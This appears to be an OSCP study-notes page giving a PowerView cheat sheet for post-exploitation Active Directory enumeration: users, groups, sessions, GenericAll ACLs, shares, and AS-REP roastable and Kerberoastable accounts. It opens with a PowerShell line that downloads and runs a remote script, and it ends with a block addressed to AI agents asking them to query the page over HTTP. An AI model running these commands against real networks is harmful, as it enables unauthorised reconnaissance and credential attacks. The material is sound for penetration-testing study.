# Powerview ``` IEX (New-Object System.Net.WebClient).DownloadString('http:///PowerView.ps1') ``` ``` Import-Module .\PowerView.ps1 ``` loading module to powershell, if it gives error then change execution policy * Basic information about the **domain**: ``` Get-NetDomain ``` * List of **all users** in the domain: ``` Get-NetUser ``` The above command's outputs can be filtered using "select" command. For example, ``` Get-NetUser | select cn ``` here cn is side-heading for the output of above command. we can select any number of them separated by comma. * Specific User ``` Get-NetUser "user" ``` * Enumerate domain groups ``` Get-NetGroup ``` * Information from specific group ``` Get-NetGroup "group name" ``` * Enumerate the computer objects in the domain ``` Get-NetComputer ``` * Scans the network in an attempt to determine if our current user has administrative permissions on any computers in the domain ``` Find-LocalAdminAccess ``` * Checking **logged on users** with Get-NetSession, adding verbosity gives more info. ``` Get-NetSession -ComputerName files04 -Verbose ``` * Listing **SPN** accounts in domain ``` Get-NetUser -SPN | select samaccountname,serviceprincipalname ``` * Enumerates ACE(access control entities), lists SID(security identifier). ObjectSID ``` Get-ObjectAcl -Identity ``` * Converting SID/ObjSID to name ``` Convert-SidToName ``` * Checking for "**GenericAll**" right for a specific group, after obtaining they can be converted using convert-sidtoname ``` Get-ObjectAcl -Identity "group-name" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights ``` * Find the **shares** in the domain ``` Find-DomainShare ``` * Identifying **AS-REP** roastable accounts ``` Get-DomainUser -PreauthNotRequired -verbose ``` * **Kerberoastable** accounts ``` Get-NetUser -SPN | select serviceprincipalname ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://aditya-3.gitbook.io/oscp/readme/active-directory/ad-post-enumeration-exploitation/powerview.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.